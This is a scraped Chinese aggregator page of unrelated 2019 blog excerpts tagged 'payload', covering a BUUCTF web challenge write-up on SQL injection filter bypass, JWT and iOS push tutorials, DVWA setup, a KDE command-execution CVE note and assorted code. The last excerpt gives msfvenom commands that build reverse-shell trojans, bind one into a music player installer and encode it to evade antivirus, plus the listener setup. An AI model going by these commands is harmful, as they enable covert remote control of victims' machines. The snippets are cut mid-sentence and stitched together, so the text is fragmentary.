payload

BUUCTF平台-web-(kzone+admin+hideandseek)记录

北城余情 提交于 2019-11-26 22:55:29
1.kzone 直接访问是跳转了,说明应该有js之类检测,不满足就跳转,直接扫一下目录: 这里就不扫了,buu有检测,怕被ban,总之可以扫描到源码: 可以看到index.php有这一段加以限制 注入点在member.php里,此时将cookie中的值json_decode以后拼接username,因为有第一行defined的限制,找到其定义的地方在common.php 其中在safe.php中对一些sql关键字进行了过滤union过滤了,and or都过滤了,\s把空格也都过滤了,那么系统表都用不了了,短路还可以用^或这||或者&&来代替,单引号也没有过滤, 因此可以闭合前面的单引号,字符串截取函数我们可以用right,因为ord+mid+ascii+substring都被过滤了,空格可以用/**/来绕过,但是等号,大于小于也没了,因此正常的注入语句就用不了,所以必须要bypass,这里注意到safe.php的过滤 这里对所有的get、post、cookie的值进行了过滤http头部内的值是没有过滤的,那么可以尝试找一下http头部内有没有注入的点,但是在此题中是不存在的,但是在member.php中要对cookie中的值进行json_decode,因此可以先对关键字进行unicode编码一下,然后经过safe.php过滤时可以顺利绕过,再经过json

JWT加密

醉酒当歌 提交于 2019-11-26 21:04:29
JWT是一种加密算法,为了防止请求的信息在传输途中被拦截修改 JWT的引用: install-package jwt JWF由三部分组成:Header,Payload,Signature Payload中放的是传输的数据 Header和Payload部分的内容是Base64编码,可以轻松的解码,所以Payload中不要放机密信息 Signature是Header,Payload和S ecretKey(秘钥) 的内容合在一起进行加密得到的,所以没有秘钥的人绝对解不开,而且其中某个部分被改动后就会匹配不上,从而防止被拦截修改 加密 //要传输的数据 var payload = new Dictionary<string, object> { { "UserId", 123 }, { "UserName", "admin" } }; //秘钥,注意不要泄露 var secret = "XXXXXXXXX"; IJwtAlgorithm algorithm = new HMACSHA256Algorithm(); IJsonSerializer serializer = new JsonNetSerializer(); IBase64UrlEncoder urlEncoder = new JwtBase64UrlEncoder(); IJwtEncoder encoder = new

Creating .pem file for APNS?

别等时光非礼了梦想. 提交于 2019-11-26 19:10:41
How do I create a .pem file to be stored in the hosting server for APN payload data? zaph Here is what I did, From: blog.boxedice.com and "iPhone Advanced Projects" chapter 10 byJoe Pezzillo. With the aps_developer_identity.cer in the keychain: Launch Keychain Access from your local Mac and from the login keychain, filter by the Certificates category. You will see an expandable option called “Apple Development Push Services” Right click on “Apple Development Push Services” > Export “Apple Development Push Services ID123″. Save this as apns-dev-cert.p12 file somewhere you can access it. There

ios 推送消息 php推送

无人久伴 提交于 2019-11-26 18:59:23
今天花了好几个小时做这个推送,前几次一直是失败,没有做对,网上看过很多教程,有几个地方要值得注意。 这篇blog写得比较清楚: http://zxs19861202.iteye.com/blog/1532460 http://www.mobiledevor.com/post/100.html 1. deviceToken 是从ios 中得到 - ( void )application:(UIApplication *)application didRegisterForRemoteNotificationsWithDeviceToken:(NSData * )pToken { NSLog( @" regisger success:%@ " , pToken); // 注册成功,将deviceToken保存到应用服务器数据库中 } 2. 步骤 1. 登录 iPhone Developer Connection Portal(http://developer.apple.com/iphone/manage/overview/index.action ) 然后点击 App IDs 2. 创建一个 Apple ID 。通配符 ID 不能用于推送通知服务。如, com.itotem.iphone 3. 点击Apple ID旁的“Configure”,根据“向导” 的步骤生成一个签名上传

安全测试

心已入冬 提交于 2019-11-26 18:48:43
搭建安全测试环境(DVWA) DVWA 全名叫Damn Vulnerable Web Application,是一个基于PHP/MYSQL的web应用。专门就是为了帮助安全测试人员去学习与测试工具用的。就是搞了一个应用,有各种各样的漏洞,专门让你用来联系安全测试的。简直太适合初学者了有没有。 下载 那么首先我们需要搭建PHP/MYSQL的环境,很简单,用xampp就好了, 我是超链接 。 然后我们下载DVWA的应用包, 点我 。 这里要提醒你,因为这个应用充满了各种漏洞,不要在本机上直接安装,否则你的电脑被黑了可不要怪我。 不能在本机上装,那就用虚拟机呗,安装VMware,再装个XP系统,我们的准备活动就差不多了。 安装 在虚拟机里,解压xampp并安装,非常简单,装好直接就打开了主面板。 解压dvwa,改名为dvwa并放在:“[xampp安装目录]\htdocs\”目录下 修改“[xampp目录]\htdocs\dvwa\config\config.inc.php”里面连接MySQL数据库的密码、端口(xampp默认MySQL用户名密码是root/root,默认端口是3306) 启动xampp的Apache和MySQL服务 获取虚拟机IP,并通过“ http://[ 虚拟机IP]:80/dvwa”进入dvwa的安装界面 点击【Create / Reset Database

Gin(十二):JWT使用

帅比萌擦擦* 提交于 2019-11-26 17:32:50
在前后端分离的项目中,越来越多的项目采用 JWT 代替传统的 cookie ,这里我们来使用 JWT 结合 Gin 来作为一个登录授权和权限校验。 🔑什么是 JWT JWT 的全称叫做 JSON WEB TOKEN,在目前前后端系统中使用较多。 JWT 构成 JWT 是由三段构成的。分别是 HEADER,PAYLOAD,VERIFY SIGNATURE,它们生成的信息通过 . 分割。 HEADER header 是由 一个 typ 和 alg 组成, typ 会指明为 JWT,而 alg 是所使用的加密算法。 { "alg" : "HS256" , "typ" : "JWT" } PAYLOAD payload 是 JWT 的载体,也就是我们要承载的信息。这段信息是我们可以自定义的,可以定义我们要存放什么信息,那些字段。该部分信息不宜过多,它会影响 JWT 生成的大小,还有就是请勿将敏感数据存入该部分,该端数据前端是可以解析获取 token 内信息的。 官方给了七个默认字段,我们可以不全部使用,也可以加入我们需要的字段。 名称 含义 Audience 表示JWT的受众 ExpiresAt 失效时间 Id 签发编号 IssuedAt 签发时间 Issuer 签发人 NotBefore 生效时间 Subject 主题 VERIFY SIGNATURE 这也是 JWT 的最后一段

KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析

为君一笑 提交于 2019-11-26 17:12:31
作者: HACHp1@知道创宇404实验室 日期: 2019/08/08 原文链接 漏洞简介 KDE Frameworks是一套由KDE社群所编写的库及软件框架,是KDE Plasma 5及KDE Applications 5的基础,并使用GNU通用公共许可证进行发布。其中所包含的多个独立框架提供了各种常用的功能,包括了硬件集成、文件格式支持、控件、绘图功能、拼写检查等。KDE框架目前被几个Linux发行版所采用,包括了Kubuntu、OpenMandriva、openSUSE和OpenMandriva。 2019年7月28日Dominik Penner(@zer0pwn)发现了KDE framework版本<=5.60.0时存在命令执行漏洞。 2019年8月5日Dominik Penner在Twitter上披露了该漏洞,而此时该漏洞还是0day漏洞。此漏洞由KDesktopFile类处理.desktop或.directory文件的方式引起。如果受害者下载了恶意构造的.desktop或.directory文件,恶意文件中注入的bash代码就会被执行。 2019年8月8日,KDE社区终于在发布的更新中修复了该漏洞;在此之前的三天内,此漏洞是没有官方补丁的。 一些八卦 在Dominik Penner公开此漏洞时,并没有告诉KDE社区此漏洞

python aiohttp asyncio 异步请求

给你一囗甜甜゛ 提交于 2019-11-26 16:15:14
转自: https://github.com/xianhu/LearnPython # _*_ coding: utf-8 _*_ """ python_aiohttp.py by xianhu """ import asyncio import aiohttp # 简单实例 async def aiohttp_test01(url): async with aiohttp.ClientSession() as session: async with session.get(url) as resp: print(resp.status) print(await resp.text()) loop = asyncio.get_event_loop() tasks = [aiohttp_test01("https://api.github.com/events")] loop.run_until_complete(asyncio.wait(tasks)) loop.close() # 其他Http方法 # session.post('http://httpbin.org/post', data=b'data') # session.put('http://httpbin.org/put', data=b'data') # session.delete('http://httpbin

# EMQ X 持久化插件系列(一)- 消息存储到 OpenTSDB 数据库

僤鯓⒐⒋嵵緔 提交于 2019-11-26 12:15:01
OpenTSDB 是可扩展的分布式时序数据库,底层依赖 HBase 并充分发挥了HBase的分布式列存储特性,支持数百万每秒的读写。 面对大规模快速增长的物联网传感器采集、交易记录等数据,时间序列数据累计速度非常快,时序数据库通过提高效率来处理这种大规模数据,并带来性能的提升,包括:更高的容纳率(Ingest Rates)、更快的大规模查询(尽管有一些比其他数据库支持更多的查询)以及更好的数据压缩。 本文以 CentOS 7.2 系统中的实际例子来说明如何通过 OpenTSDB 来存储相关的信息。 安装与验证 OpenTSDB 服务器 读者可以参考 OpenTSDB 官方文档 或 Docker 来下载安装 OpenTSDB 服务器,本文使用 OpenTSDB 2.4.0 版本。 配置 EMQ X 服务器 通过 RPM 方式安装的 EMQ X,OpenTSDB 相关的配置文件位于 /etc/emqx/plugins/emqx_backend_opentsdb.conf ,考虑到功能定位,OpenTSDB 插件仅支持消息存储功能。更多 backend 插件详见 EMQ X 数据持久化 。 配置连接地址与连接池大小、batch 策略: ## OpenTSDB Server 接入地址 backend.opentsdb.pool1.server = 127.0.0.1:4242 ##

兴趣之渗透测试学习

旧时模样 提交于 2019-11-26 09:25:28
一、msf框架 1、 生成木马程序: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘0x00’ LHOST=192.168.123.126 LPORT=5555 -f exe > asd.exe 进入程序:msfconsole 使用handler模块:use exploit/multi/handler 设置PAYLOAD:set PAYLOAD windows/meterpreter/reverse_tcp 设置控制端ip和端口:set lhost set lport 攻击:exploit 2、正常软件绑定木马程序 生成木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.123.126 lport=5555 -x 网易云音乐.exe -k -f exe -o 网易云音乐.exe 3、杀毒软件免杀木马程序 生成木马:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -x calc.exe lhost=192.168.123.126 lport=444 -f exe -o